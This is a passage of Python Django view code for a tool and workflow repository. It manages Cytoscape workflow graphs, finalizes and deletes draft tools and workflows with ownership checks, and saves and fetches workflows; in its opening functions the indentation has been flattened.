target_node = all_nodes[target_id]
if not target_node['data']['type'] == 'tool':
continue
# This is a tool. There exist an edge rec_tool_node --> target_node. This means that rec_tool_node dependes from target_node
if not target_id in ret:
ret.add(target_id)
recurse(target_node)
#print ('set 2:', ret)
recurse(tool_node)
ret.add(tool_node['data']['id'])
return ret
def __create_cytoscape_graph_from_tool_dependencies(self, tool):
'''
tool is a database object.
Return a workflow cytoscape worflow. It does not contain the workflow node!
tool_depending_from_me=None
'''
all_ids = set()
workflow = {
'elements': {
'nodes': [],
'edges': [],
}
}
this_tool_cytoscape_node = tool_node_cytoscape(tool)
workflow['elements']['nodes'].append(this_tool_cytoscape_node)
# FIXME !!! DUPLICATE CODE
root_tool_all_dependencies = tool_get_dependencies_internal(tool, include_as_root=False)
for root_tool_all_dependency in root_tool_all_dependencies:
# For each dependency create a cytoscape node
cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'], tool_depending_from_me=root_tool_all_dependency['dependant'])
if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph... FIXME!! all_ids is always empty!
workflow['elements']['nodes'].append(cytoscape_node)
# Connect this tool with its dependent tool node
if root_tool_all_dependency['dependant']:
workflow['elements']['edges'].append(edge_cytoscape(tool_node_cytoscape(root_tool_all_dependency['dependant']), cytoscape_node))
else:
# This tool does not have a dependant!
# This is a dependency of the root tool!
workflow['elements']['edges'].append(edge_cytoscape(this_tool_cytoscape_node, cytoscape_node))
return workflow
def __node_belongs_to_a_workflow(self, node, workflow, workflow_nodes):
'''
Recursive
'''
if not node: # We are running this for ALL workflow nodes. Including the root workflow that its belongto to is None
return False
# We reached the root
if not node['data']['belongto']:
return False
workflow_key = workflow['data']['id']
node_belongto_key = workflow_id_cytoscape(node['data']['belongto'], None, None)
#print ('Checking: {} == {}'.format(workflow_key, node_belongto_key))
if workflow_key == node_belongto_key:
return True
# This node does not belong to this workflow. Perhaps the node-->belongto workflow belongs to this workflow
return self.__node_belongs_to_a_workflow(workflow_nodes[node_belongto_key], workflow, workflow_nodes)
def __nodes_belonging_to_a_workflow(self, graph, workflow_node, workflow_nodes):
'''
Returns a set
'''
ret = {element['data']['id'] for element in graph['elements']['nodes']
if self.__node_belongs_to_a_workflow(element, workflow_node, workflow_nodes)}
ret.add(workflow_node['data']['id']) # Add the workflow node as well
return ret
    def __remove_nodes_edges(self, graph, node_ids_to_remove, node_ids_to_add):
        '''
        Remove from graph (in place) the nodes in node_ids_to_remove and
        every edge that would be left dangling, keeping edges whose removed
        endpoint is about to be re-added (node_ids_to_add).
        CRITICAL: A mistake here could produce a corrupted graph..
        '''
        # Determine which edges should be removed
        edge_ids_to_remove = set()
        for edge in graph['elements']['edges']:
            source_id = edge['data']['source']
            target_id = edge['data']['target']
            edge_id = edge['data']['id']
            # "in" = the endpoint is one of the nodes being removed
            source_id_in = source_id in node_ids_to_remove
            target_id_in = target_id in node_ids_to_remove
            # This is an edge from inside to inside. Remove it
            if source_id_in and target_id_in:
                edge_ids_to_remove.add(edge_id)
                continue
            # This is an edge from inside to outside
            # Also, on the new workflow, the inside node does not exist!
            # So we are removing the edge. This might render the workflow useless, but not corrupted!
            if source_id_in and not target_id_in:
                if not source_id in node_ids_to_add:
                    edge_ids_to_remove.add(edge_id)
                continue
            # Same as before but the edge is from outside to inside
            if not source_id_in and target_id_in:
                if not target_id in node_ids_to_add:
                    edge_ids_to_remove.add(edge_id)
        # Remove edges
        graph['elements']['edges'] = [edge for edge in graph['elements']['edges'] if not edge['data']['id'] in edge_ids_to_remove]
        # Remove nodes
        graph['elements']['nodes'] = [node for node in graph['elements']['nodes'] if not node['data']['id'] in node_ids_to_remove]
    def __consistency_check_graph_model(self, graph, workflow):
        '''
        Synchronize the database model of *workflow* with its cytoscape *graph*.

        Whenever we update the graph of a workflow, we have to make sure that all tools/workflows that this graph has, do exist in the model
        We also need to check the opposite: All tools/workflows that exist in the model also exist in the graph

        graph: a cytoscape JSON object ({'elements': {'nodes': [...], ...}})
        workflow: a Workflow database object whose tools/workflows M2M sets are updated in place
        '''
        # Map str(obj) -> [found_in_graph_flag, db_object] for every tool/workflow
        # currently attached to the model. The flag is flipped to True when the
        # corresponding node is seen in the graph; entries left False afterwards
        # are removed from the model.
        workflow_using_me_tools = workflow.tools.all()
        tools_found = {str(t): [False, t] for t in workflow_using_me_tools}
        workflow_using_me_workflow = workflow.workflows.all()
        workflows_found = {str(w): [False, w] for w in workflow_using_me_workflow}
        for node in graph['elements']['nodes']:
            if node['data']['type'] == 'tool':
                # Disconnected nodes are not considered part of the workflow
                if node['data']['disconnected']:
                    continue
                # This is a tool does it exist in the model?
                this_tool = Tool.objects.get(name=node['data']['name'], version=node['data']['version'], edit=node['data']['edit'])
                if not workflow_using_me_tools.filter(pk=this_tool.pk).exists():
                    # This tools does not exist in the model but exists on the graph. Add it!
                    workflow.tools.add(this_tool)
                else:
                    tools_found[str(this_tool)][0] = True
            if node['data']['type'] == 'workflow':
                if node['data']['disconnected']:
                    continue
                if not node['data']['belongto']:
                    continue # Do not connect the root workflow
                this_workflow = Workflow.objects.get(name=node['data']['name'], edit=node['data']['edit'])
                if not workflow_using_me_workflow.filter(pk=this_workflow.pk).exists():
                    # This workflow does not exist in the model but exists on the graph. Add it!
                    workflow.workflows.add(this_workflow)
                else:
                    workflows_found[str(this_workflow)][0] = True
        workflow.save()
        # Is there any tool that exist on the model, but it does not exist on the graph?
        for tool_id, (exists, this_tool) in tools_found.items():
            if not exists:
                # This tool exists on the model but not in the graph. REMOVE IT!
                workflow.tools.remove(this_tool)
        # Is there any workflow that exists on the model, but it does not exist on the graph?
        for workflow_id, (exists, this_workflow) in workflows_found.items():
            if not exists:
                # Remove this workflow from the model
                workflow.workflows.remove(this_workflow)
        workflow.save()
def __update_workflow_node(self, workflow_node, workflow_object):
'''
Update a workflow node according to the data from the workflow_object
'''
workflow_node['data']['draft'] = workflow_object.draft
    def __update_workflow(self,):
        '''
        update this workflow

        Persists self.graph into self.workflow, then re-embeds this workflow's
        sub-graph into every workflow that uses it (self.workflows_using_me):
        the stale copy of the sub-graph is cut out of the parent graph and the
        fresh one is spliced in, with main steps demoted to sub_main.
        '''
        self.__update_workflow_node(self.workflow_nodes[self.key], self.workflow)
        self.workflow.workflow = simplejson.dumps(self.graph)
        self.workflow.save()
        # Update also the workflows that are using me
        for workflow_using_me in self.workflows_using_me:
            #print ('workflow using me:', workflow_using_me)
            graph = simplejson.loads(workflow_using_me.workflow)
            belongto, workflow_nodes = self.__build_workflow_belongto(graph)
            # Get the workflow that the workflow that we want to update belongs to
            belongto_root = belongto[self.key]
            #print (' belongto_root: ', belongto_root)
            # Get the workflow node that we want to update
            workflow_node_root = workflow_nodes[self.key]
            #print (' Workflow node root:', workflow_node_root)
            # This is a set of all the nodes that this sub-workflow has
            workflow_nodes_set = self.__nodes_belonging_to_a_workflow(graph, workflow_node_root, workflow_nodes)
            #print (' workflow nodes set:', workflow_nodes_set)
            # Remove these nodes (and edges connected to them) from the graph
            self.__remove_nodes_edges(graph, workflow_nodes_set, self.all_ids)
            #print ('The graph after removing of nodes edges:')
            #print (simplejson.dumps(graph, indent=4))
            # Add the edges of this graph
            graph['elements']['edges'].extend(self.graph['elements']['edges'])
            # Add the nodes of this graph
            # Make sure that any main step becomes sub_main
            # NOTE(review): this mutates the node dicts of self.graph in place —
            # presumably acceptable because self.graph was already persisted above.
            nodes_to_add = self.graph['elements']['nodes']
            for node in nodes_to_add:
                if node['data']['type'] == 'step':
                    if node['data']['main']:
                        node['data']['main'] = False
                        node['data']['sub_main'] = True
            graph['elements']['nodes'].extend(nodes_to_add)
            # Update the belongto info on the root workflow node. We cannot use the belongto and workflow_nodes any more
            workflow_node_root = [node for node in graph['elements']['nodes'] if node['data']['id'] == self.key][0]
            workflow_node_root['data']['belongto'] = {'name': belongto_root['data']['name'] , 'edit': belongto_root['data']['edit']}
            # Update the root workflow node
            self.__update_workflow_node(workflow_node_root, self.workflow)
            # Save the graph
            workflow_using_me.workflow = simplejson.dumps(graph)
            workflow_using_me.save()
            # Check graph <--> model consistency
            self.__consistency_check_graph_model(graph, workflow_using_me)
    def __update_tool(self,):
        '''
        Re-embed this tool's dependency sub-graph into every workflow that is
        using the tool (self.workflows_using_me): the nodes that depend on the
        tool are cut out of each workflow graph and the fresh sub-graph
        (self.graph) is spliced in with the original belongto info restored.
        '''
        # Update all the workflows who are using this tool
        for workflow_using_me in self.workflows_using_me:
            #print ('The graph of this tool:')
            #print (simplejson.dumps(self.graph, indent=4))
            #print ('Workflow using me:', workflow_using_me.name, workflow_using_me.edit)
            graph = simplejson.loads(workflow_using_me.workflow)
            #print (' The workflow graph:')
            #print (simplejson.dumps(graph, indent=4))
            # Index the workflow graph: id -> node, id -> belongto info
            all_nodes = {node['data']['id']:node for node in graph['elements']['nodes']}
            belongto = {node['data']['id']: node['data']['belongto'] for node in graph['elements']['nodes']}
            edges = self.__build_edges_dict(graph)
            #print (' All nodes:')
            #print (simplejson.dumps(all_nodes, indent=4))
            #print (' Belongto:')
            #print (simplejson.dumps(belongto, indent=4))
            #print (' self.key:', self.key)
            tool_node = all_nodes[self.key]
            tool_node_belongto = belongto[self.key]
            # Use download_tool() does the same task. The problem is that it works directly with the UI.
            # We want to construct a cytoscape graph from the database object
            # Get a set of the node ids that depend from this tool
            tool_dependencies = self.__tool_dependencies(tool_node, all_nodes, edges)
            #print (' Nodes to delete:')
            #print (tool_dependencies)
            # Remove these nodes (and edges connected to them) from the graph
            self.__remove_nodes_edges(graph, tool_dependencies, self.all_ids)
            #print (' Graph After Deletion of nodes and edges:')
            #print (simplejson.dumps(graph, indent=4))
            # Add the edges of the graph
            #print (' Edges to add:')
            #print (simplejson.dumps(self.graph['elements']['edges'], indent=4))
            graph['elements']['edges'].extend(self.graph['elements']['edges'])
            # Add the nodes of this graph
            # Make sure that they have the right belongto info
            # (the fresh nodes carry a generic belongto; restore the one the
            # tool had inside this particular workflow)
            nodes_to_add = self.graph['elements']['nodes']
            for node_to_add in nodes_to_add:
                node_to_add['data']['belongto'] = tool_node_belongto
            #print (' Nodes to add:')
            #print (simplejson.dumps(nodes_to_add, indent=4))
            graph['elements']['nodes'].extend(nodes_to_add)
            #print (' Graph after adding new tool dependencies')
            #print (simplejson.dumps(graph, indent=4))
            # Save the graph
            workflow_using_me.workflow = simplejson.dumps(graph)
            workflow_using_me.save()
            # Check graph <--> model consistency
            self.__consistency_check_graph_model(graph, workflow_using_me)
@has_data
def ro_finalize_delete(request, **kwargs):
    '''
    Called from ro_finalize_delete/
    if action is FINALIZE:
        finalize a tool/workflow (from draft to no draft!)
    if action is DELETE
        DELETE a tool/workflow
    ro: tool or workflow

    kwargs:
        ro: 'tool' or 'workflow' -- which kind of research object to act on
        action: 'FINALIZE' or 'DELETE'
        tools_info_name / tools_info_version / tools_info_edit: identify the tool (ro == 'tool')
        workflow_info_name / workflow_info_edit: identify the workflow (ro == 'workflow')
    Returns a success()/fail() JSON response. Only the creator of a draft
    object may finalize or delete it.
    '''
    ro = kwargs.get('ro', '')
    if not ro:
        return fail('Error 5476')
    if not ro in ['tool', 'workflow']:
        return fail('Error 5477')
    action = kwargs.get('action', '')
    if not action in ['FINALIZE', 'DELETE']:
        return fail('Error 5475')
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist as e:
        return fail('Error 5472')
    if ro == 'tool':
        tools_info_name = kwargs.get('tools_info_name', '')
        if not tools_info_name:
            return fail('Error 5467')
        tools_info_version = kwargs.get('tools_info_version', '')
        if not tools_info_version:
            return fail('Error 5468')
        tools_info_edit = kwargs.get('tools_info_edit', '')
        if not tools_info_edit:
            return fail('Error 5469')
        try:
            tools_info_edit = int(tools_info_edit)
        except ValueError as e:
            return fail('Error 5470')
        # Get the tool
        try:
            tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=tools_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 5471')
        # Is the user who created the tool, the same as the user who wants to edit/delete it?
        if not tool.obc_user == obc_user:
            return fail('Error 5473')
        # Only draft tools can be finalized or deleted
        if not tool.draft:
            return fail('Error 5474')
        if action == 'FINALIZE':
            # Does it depend on any tool that is draft?
            draft_dependencies = [t for t in tool_get_dependencies_internal(tool, include_as_root=False) if t['dependency'].draft]
            if draft_dependencies:
                return fail('This tool cannot be finalized. It depends from {} draft tool(s). For example: {}'.format(len(draft_dependencies), str(draft_dependencies[0]['dependency'])))
            tool.draft = False
            tool.save()
            # Propagate the (now final) tool into workflow graphs that use it
            WJ = WorkflowJSON()
            WJ.update_tool(tool)
        elif action == 'DELETE':
            # Is there any other tool that depends from this tool?
            dependendants = Tool.objects.filter(dependencies__in=[tool])
            if dependendants.count():
                return fail('This tool cannot be deleted. There are {} tool(s) that depend on this tool. For example: {}'.format(dependendants.count(), dependendants.first()))
            # Is there any workflow that contains this tool?
            w = Workflow.objects.filter(tools__in=[tool])
            if w.count():
                return fail('This tool cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
            # Get the tools that are forks of this tool
            tool_forks = Tool.objects.filter(forked_from=tool)
            # Get the tool that this tool is forked from
            tool_forked_from = tool.forked_from
            # All the tools that are forked from this tool are now forked from the tool that this tool was forked from!
            for tool_fork in tool_forks:
                tool_fork.forked_from = tool_forked_from
                tool_fork.save()
            # Delete the comment
            tool.comment.delete()
            # Delete the tool
            tool.delete()
        return success()
    elif ro == 'workflow':
        workflow_info_name = kwargs.get('workflow_info_name', '')
        if not workflow_info_name:
            return fail('Error 5478')
        workflow_info_edit = kwargs.get('workflow_info_edit', '')
        if not workflow_info_edit:
            return fail('Error 5479')
        try:
            workflow_info_edit = int(workflow_info_edit)
        except ValueError as e:
            return fail('Error 5480')
        # Get the workflow
        try:
            workflow = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 5481')
        #Is the user who created the workflow the same as the one who wants to edit/delete it?
        if obc_user != workflow.obc_user:
            return fail('Error 5482')
        # Basic sanity check..
        if not workflow.draft:
            return fail('Error 5483')
        if action == 'FINALIZE':
            # Does it contain any tool that it is draft?
            t = workflow.tools.filter(draft=True)
            if t.count():
                return fail('This workflow cannot be finalized. It contains {} draft tool(s). For example: {}'.format(t.count(), str(t.first())))
            # Does it contain any draft workflow?
            w = workflow.workflows.filter(draft=True)
            if w.count():
                return fail('This workflow cannot be finalized. It contains {} draft workflow(s). For example: {}'.format(w.count(), str(w.first())))
            workflow.draft = False
            workflow.save()
            #workflow_has_changed(workflow) # Update other workflows that are using this
            WJ = WorkflowJSON()
            WJ.update_workflow(workflow) # TODO limit action to finalize!
        elif action == 'DELETE':
            # Is there any workflow that contains this workflow?
            w = Workflow.objects.filter(workflows__in = [workflow])
            if w.count():
                return fail('This workflow cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
            # Get the workflows that are forks of this workflow
            workflow_forks = Workflow.objects.filter(forked_from=workflow)
            # Get the workflow that this workflow is forked from
            workflow_forked_from = workflow.forked_from
            # All the workflows that are forked from this workflow are now forked from the workflow that this workflow was forked from!
            for workflow_fork in workflow_forks:
                workflow_fork.forked_from = workflow_forked_from
                workflow_fork.save()
            # Delete the comments
            workflow.comment.delete()
            # Delete the workflow
            workflow.delete()
        return success()
def create_workflow_edge_id(source_id, target_id):
    '''
    Build a "unique" id for an edge from its endpoint node ids.

    ATTENTION!!!!
    This should be in accordance with the javascript code: File: ui.js
    /*
    * Create a "unique" id for an edge
    */
    function create_workflow_edge_id(source_id, target_id) {
        return source_id + '..' + target_id;
    }
    '''
    return '..'.join((source_id, target_id))
def create_workflow_id(workflow):
    '''
    Build a "unique" id for a workflow (database object or plain dict).

    ATTENTION!!
    This should be in accordance with the javascript code: File: ui.js
    /*
    * Creates a "unique" id from a workflow
    */
    function create_workflow_id(workflow) {
        return workflow.name + '__' + workflow.edit; //It is ok if this is wf1__null
    }
    '''
    if isinstance(workflow, Workflow):
        # Normalize the database object into the plain-dict shape first
        workflow = {'name': workflow.name, 'edit': workflow.edit}
    return '{}__{}'.format(workflow['name'], workflow['edit'])
def set_edit_to_cytoscape_json(cy, edit, workflow_info_name):
    '''
    Perform the following tasks:
    * Set the edit number of the workflow to all nodes/edges
    * Change the id of the root workflow from "root" to workflow_info_name

    cy: cytoscape JSON object, mutated in place
    edit: the edit (version) number to stamp on the graph
    workflow_info_name: the final name of the workflow (replaces 'root')

    Ids built on the client use the placeholders '__null' (unknown edit) and
    'root__' (unnamed root workflow); every occurrence in node ids, bash
    snippets, step/input/output references and edge endpoints is rewritten.
    '''
    # Get the root workflow node (the only workflow node without an edit yet)
    new_worfklow_node = [x for x in cy['elements']['nodes'] if x['data']['type']=='workflow' and not x['data']['edit']]
    assert len(new_worfklow_node) == 1
    assert new_worfklow_node[0]['data']['name'] == 'root'
    # Set the edit value
    new_worfklow_node[0]['data']['edit'] = edit
    # Set the label value
    new_worfklow_node[0]['data']['label'] = workflow_label_cytoscape(None, workflow_info_name, edit)
    belongto = {
        'name': workflow_info_name,
        'edit': edit,
    }
    belongto_id = create_workflow_id(belongto)
    for node in cy['elements']['nodes']:
        # Nodes that belonged to the (then unnamed) root workflow now belong
        # to the named/edited workflow
        if not node['data']['belongto'] is None:
            if not node['data']['belongto']['edit']:
                node['data']['belongto'] = belongto
        if 'name' in node['data']:
            if node['data']['name'] == 'root':
                node['data']['name'] = workflow_info_name
        if '__null' in node['data']['id']:
            node['data']['id'] = node['data']['id'].replace('__null', '__' + str(edit))
        if 'root__' in node['data']['id']:
            node['data']['id'] = node['data']['id'].replace('root__', workflow_info_name + '__')
        #Change the bash
        if 'bash' in node['data']:
            node['data']['bash'] = node['data']['bash'].replace('__null', '__' + str(edit))
            node['data']['bash'] = node['data']['bash'].replace('root__', workflow_info_name + '__')
        # Set to step-->Step
        if 'steps' in node['data']:
            for step_i, _ in enumerate(node['data']['steps']):
                if '__null' in node['data']['steps'][step_i]:
                    node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('__null', '__' + str(edit))
                if 'root__' in node['data']['steps'][step_i]:
                    node['data']['steps'][step_i] = node['data']['steps'][step_i].replace('root__', workflow_info_name + '__')
        # Set to step-->inputs
        if 'inputs' in node['data']:
            for input_i, _ in enumerate(node['data']['inputs']):
                if '__null' in node['data']['inputs'][input_i]:
                    node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('__null', '__' + str(edit))
                if 'root__' in node['data']['inputs'][input_i]:
                    node['data']['inputs'][input_i] = node['data']['inputs'][input_i].replace('root__', workflow_info_name + '__')
        # Set to step->outputs
        if 'outputs' in node['data']:
            for output_i, _ in enumerate(node['data']['outputs']):
                if '__null' in node['data']['outputs'][output_i]:
                    node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('__null', '__' + str(edit))
                if 'root__' in node['data']['outputs'][output_i]:
                    node['data']['outputs'][output_i] = node['data']['outputs'][output_i].replace('root__', workflow_info_name + '__')
    if 'edges' in cy['elements']:
        for edge in cy['elements']['edges']:
            if '__null' in edge['data']['source']:
                edge['data']['source'] = edge['data']['source'].replace('__null', '__' + str(edit))
            if 'root__' in edge['data']['source']:
                edge['data']['source'] = edge['data']['source'].replace('root__', workflow_info_name + '__')
            if '__null' in edge['data']['target']:
                edge['data']['target'] = edge['data']['target'].replace('__null', '__' + str(edit))
            if 'root__' in edge['data']['target']:
                edge['data']['target'] = edge['data']['target'].replace('root__', workflow_info_name + '__')
            # Rebuild the edge id from the (now rewritten) endpoints
            if '__null' in edge['data']['id']:
                edge['data']['id'] = create_workflow_edge_id(edge['data']['source'], edge['data']['target'])
def check_workflow_step_main(cy, root_workflow):
    '''
    Count how many "main" steps belong directly to the root workflow.
    It should be one and only one main step on the main workflow;
    the caller is expected to treat 0 or >1 as an error.
    '''
    return sum(
        1
        for node in cy['elements']['nodes']
        if node['data']['type'] == 'step'
        and node['data']['belongto'] == root_workflow
        and node['data']['main']
    )
@has_data
def workflows_add(request, **kwargs):
    '''
    add workflow, workflow add, save workflow, workflow save, save wf
    edit workflow edit update workflow

    Creates a new workflow or replaces an existing draft (workflow_edit_state).
    Editing works by deleting the old draft object while preserving its
    comments, votes, fork links, created_at and back-references, then creating
    a fresh Workflow row and reattaching everything.

    kwargs (main ones):
        workflow_info_name / workflow_info_edit: identify the workflow
        workflow_edit_state: bool -- True when re-saving an existing draft
        workflow_json: cytoscape graph from the client
        workflow_description / workflow_website / workflow_keywords
        workflow_info_forked_from / workflow_changes: fork bookkeeping
    Returns success() with the new edit number, score, vote state and comment
    thread, or fail() with an error message.
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Please login to create new workflow')
    if not user_is_validated(request):
        return fail('Please validate your email to create new workflows ' + validate_toast_button());
    obc_user = OBC_user.objects.get(user=request.user)
    workflow_info_name = kwargs.get('workflow_info_name', '')
    if not workflow_info_name.strip():
        return fail('Invalid workflow name')
    workflow_info_forked_from = kwargs['workflow_info_forked_from'] # If it does not exist, it should raise an Exception
    workflow_edit_state = kwargs.get('workflow_edit_state', '')
    if not type(workflow_edit_state) is bool:
        return fail('Error 4877')
    upvoted = False
    downvoted = False
    workflow_forked_from = None
    workflow_changes = None
    if workflow_edit_state:
        # We are editing this workflow
        # Get the edit
        workflow_info_edit = kwargs.get('workflow_info_edit', '')
        # Is this an int?
        try:
            workflow_info_edit = int(workflow_info_edit)
        except ValueError as e:
            return fail('Error 4878')
        # Does this workflow exist?
        try:
            w = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 4879')
        # Basic sanity check. We shouldn't be able to edit a workflow which is not a draft..
        if not w.draft:
            return fail('Error 4880')
        # Is the creator of the workflow the same as the user who edits it?
        if obc_user != w.obc_user:
            return fail('Error 4881')
        # Store a reference to the comments
        comment = w.comment
        # Store upvotes/downvotes
        upvotes = w.upvotes
        downvotes = w.downvotes
        # Store votes
        votes = UpDownWorkflowVote.objects.filter(workflow=w)
        # Disassociate from this tool and get upvoted/downvoted status
        # (the votes are reattached to the new workflow object further below)
        for vote in votes:
            if vote.obc_user == obc_user:
                upvoted = vote.upvote
                downvoted = not upvoted
            vote.workflow = None
            vote.save()
        # Get the workflows that are forks of this workflow
        workflow_forks = Workflow.objects.filter(forked_from=w)
        # Temporary set that these workflows are not forked from any workflow
        for workflow_fork in workflow_forks:
            workflow_fork.forked_from = None
            workflow_fork.save()
        # Get the workflow that this workflow is forked from
        workflow_forked_from = w.forked_from
        # Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
        workflow_created_at = w.created_at
        # Get the workflows that use this workflow
        workflows_using_this_workflow = Workflow.objects.filter(workflows__in = [w])
        # Remove this workflow from these workflows
        for workflow_using_this_workflow in workflows_using_this_workflow:
            workflow_using_this_workflow.workflows.remove(w)
            workflow_using_this_workflow.save()
        # Delete it!
        w.delete()
    else:
        # This is a new workflow
        upvotes = 0
        downvotes = 0
        workflow_changes = kwargs.get('workflow_changes', None)
        if workflow_info_forked_from:
            # A forked workflow must document what changed
            if not workflow_changes:
                return fail('Edit Summary cannot be empty')
            workflow_forked_from = Workflow.objects.get(name=workflow_info_forked_from['name'], edit=workflow_info_forked_from['edit'])
        else:
            pass # Do nothing
    workflow_website = kwargs.get('workflow_website', '')
    if workflow_website:
        if not valid_url(workflow_website):
            return fail('website is not a valid URL')
    workflow_description = kwargs.get('workflow_description', '')
    if not workflow_description.strip():
        return fail('Description cannot be empty')
    workflow_description_html = markdown(workflow_description)
    workflow = kwargs.get('workflow_json', '')
    #print ('Workflow from angular:')
    #print (simplejson.dumps(workflow, indent=4))
    if not workflow:
        return fail ('workflows json object is empty') # This should never happen!
    if not workflow['elements']:
        return fail('workflow graph cannot be empty')
    # Client sents the root workflow node.
    # When we save we make root False so that it is easier to import it later
    #workflow_root_node = [x for x in workflow['elements']['nodes'] if x['data']['type']=='workflow' and x['data']['root']]
    #if len(workflow_root_node) != 1:
    #    return fail('Error 28342')
    #workflow_root_node[0]['data']['root'] = False
    #Check that one and only one step is main
    if workflow_edit_state:
        next_edit = workflow_info_edit
    else:
        #Get the maximum version. FIXME DUPLICATE CODE
        workflow_all = Workflow.objects.filter(name__iexact=workflow_info_name)
        if not workflow_all.exists():
            next_edit = 1
        else:
            max_edit = workflow_all.aggregate(Max('edit'))
            next_edit = max_edit['edit__max'] + 1
    #Change the edit value in the cytoscape json object
    set_edit_to_cytoscape_json(workflow, next_edit, workflow_info_name)
    # print ('Workflow from set_edit:')
    # print (simplejson.dumps(workflow, indent=4))
    #print (simplejson.dumps(workflow, indent=4))
    main_counter = check_workflow_step_main(workflow, {'name':workflow_info_name, 'edit': next_edit })
    if main_counter == 0:
        return fail('Could not find main step. One step needs to be declared as "main"')
    if main_counter > 1:
        return fail('Error 49188') # This should never happen
    new_workflow = Workflow(
        obc_user=obc_user,
        name = workflow_info_name,
        edit = next_edit,
        website = workflow_website,
        description = workflow_description,
        description_html = workflow_description_html,
        # FIXME !! SERIOUS!
        # This is redundand. We do json.loads and then json.dumps.
        # On the other hand, how else can we check if elements are not empty? (perhaps on the backend..)
        workflow = simplejson.dumps(workflow),
        forked_from = workflow_forked_from,
        changes = workflow_changes,
        upvotes = upvotes,
        downvotes = downvotes,
        draft = True, # We always save new workflows as draft.
    )
    #Save it
    new_workflow.save()
    if workflow_edit_state:
        # Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
        new_workflow.created_at = workflow_created_at
        new_workflow.save()
    # Get all tools that are used in this workflow except the ones that are disconnected
    tool_nodes = [x for x in workflow['elements']['nodes'] if (x['data']['type'] == 'tool') and (not x['data']['disconnected'])]
    tools = [Tool.objects.get(name=x['data']['name'], version=x['data']['version'], edit=x['data']['edit']) for x in tool_nodes]
    if tools:
        new_workflow.tools.add(*tools)
        new_workflow.save()
    # Get all workflows that are used in this workflow
    workflow_nodes = [x for x in workflow['elements']['nodes'] if x['data']['type'] == 'workflow']
    # print (simplejson.dumps(workflow_nodes, indent=4))
    # Remove self workflow and workflows that are disconnected
    workflow_nodes = [
        {'name': x['data']['name'], 'edit': x['data']['edit']}
        for x in workflow_nodes if
        (not (x['data']['name'] == workflow_info_name and x['data']['edit'] == next_edit)) and (not x['data']['disconnected'])
    ]
    # Get workflow database objects
    workflows = [Workflow.objects.get(**x) for x in workflow_nodes]
    if workflows:
        new_workflow.workflows.add(*workflows)
        new_workflow.save()
    # Add keywords
    keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['workflow_keywords']]
    new_workflow.keywords.add(*keywords)
    new_workflow.save();
    obc_user = OBC_user.objects.get(user=request.user)
    if workflow_edit_state:
        # Add the votes from the previous edit
        for vote in votes:
            vote.workflow = new_workflow
            vote.save()
        # Add the workflows that were forked from this workflow (that was deleted before) to the new workflow
        for workflow_fork in workflow_forks:
            workflow_fork.forked_from = new_workflow
            workflow_fork.save()
        # Add to the workflows that were using this workflow, the new workflow
        for workflow_using_this_workflow in workflows_using_this_workflow:
            #print ('Workflow using this workflow:', str(workflow_using_this_workflow))
            workflow_using_this_workflow.workflows.add(new_workflow)
            workflow_using_this_workflow.save()
        # Update the json graph to the workflows that are using me
        WJ = WorkflowJSON()
        WJ.update_workflow(new_workflow)
    else:
        # Add an empty comment. This will be the root comment for the QA thread
        comment = Comment(
            obc_user = obc_user,
            comment = '',
            comment_html = '',
            title = markdown('Discussion on Workflow: w/{}/{}'.format(workflow_info_name, next_edit)),
            parent = None,
            upvotes = 0,
            downvotes = 0,
        )
        comment.save()
    new_workflow.comment = comment
    new_workflow.save()
    #print ('AFTER SAVE:')
    #print (simplejson.dumps(simplejson.loads(new_workflow.workflow), indent=4))
    ret = {
        'description_html': workflow_description_html,
        'edit': next_edit,
        'created_at': datetime_to_str(new_workflow.created_at),
        'score': upvotes-downvotes,
        'voted': {'up': upvoted, 'down': downvoted},
        'workflow_pk': new_workflow.pk, # Used in comments
        'workflow_thread': qa_create_thread(new_workflow.comment, obc_user), # Tool comment thread
    }
    return success(ret)
@has_data
def workflows_search_3(request, **kwargs):
    '''
    This is triggered when a user drags a workflow from the jstree and drops it in a current workflow

    kwargs:
        workflow_name / workflow_edit: identify the workflow to fetch
    Returns success() with the full workflow record: graph JSON, description,
    keywords, fork origin, vote status of the current user and comment thread.
    '''
    workflow_name = kwargs['workflow_name']
    workflow_edit = kwargs['workflow_edit']
    workflow = Workflow.objects.get(name__iexact = workflow_name, edit=workflow_edit)
    # Get current obc_user (None for anonymous visitors)
    if request.user.is_anonymous:
        obc_user = None
    else:
        obc_user = OBC_user.objects.get(user=request.user)
    #Is it voted?
    if obc_user:
        try:
            v = UpDownWorkflowVote.objects.get(obc_user=obc_user, workflow=workflow)
        except ObjectDoesNotExist as e:
            # It is not voted
            workflow_voted = {'up': False, 'down': False}
        else:
            # It is noted
            workflow_voted = {'up': v.upvote, 'down': not v.upvote}
    else:
        workflow_voted = {'up': False, 'down': False}
    ret = {
        'username': workflow.obc_user.user.username,
        'website': workflow.website,
        'description': workflow.description,
        'description_html': workflow.description_html,
        'created_at': datetime_to_str(workflow.created_at),
        'forked_from': workflow_to_json(workflow.forked_from),
        'keywords': [keyword.keyword for keyword in workflow.keywords.all()],
        'workflow' : simplejson.loads(workflow.workflow),
        'changes': workflow.changes,
        'workflow_pk': workflow.pk, # Used in comments (QAs)
        'workflow_thread': qa_create_thread(workflow.comment, obc_user), # Workflow comment thread
        'workflow_score': workflow.upvotes - workflow.downvotes,
        'workflow_voted': workflow_voted,
        'workflow_comment_id': workflow.comment.pk, # Used to create a permalink to the comments
        'workflow_comment_title': workflow.comment.title,
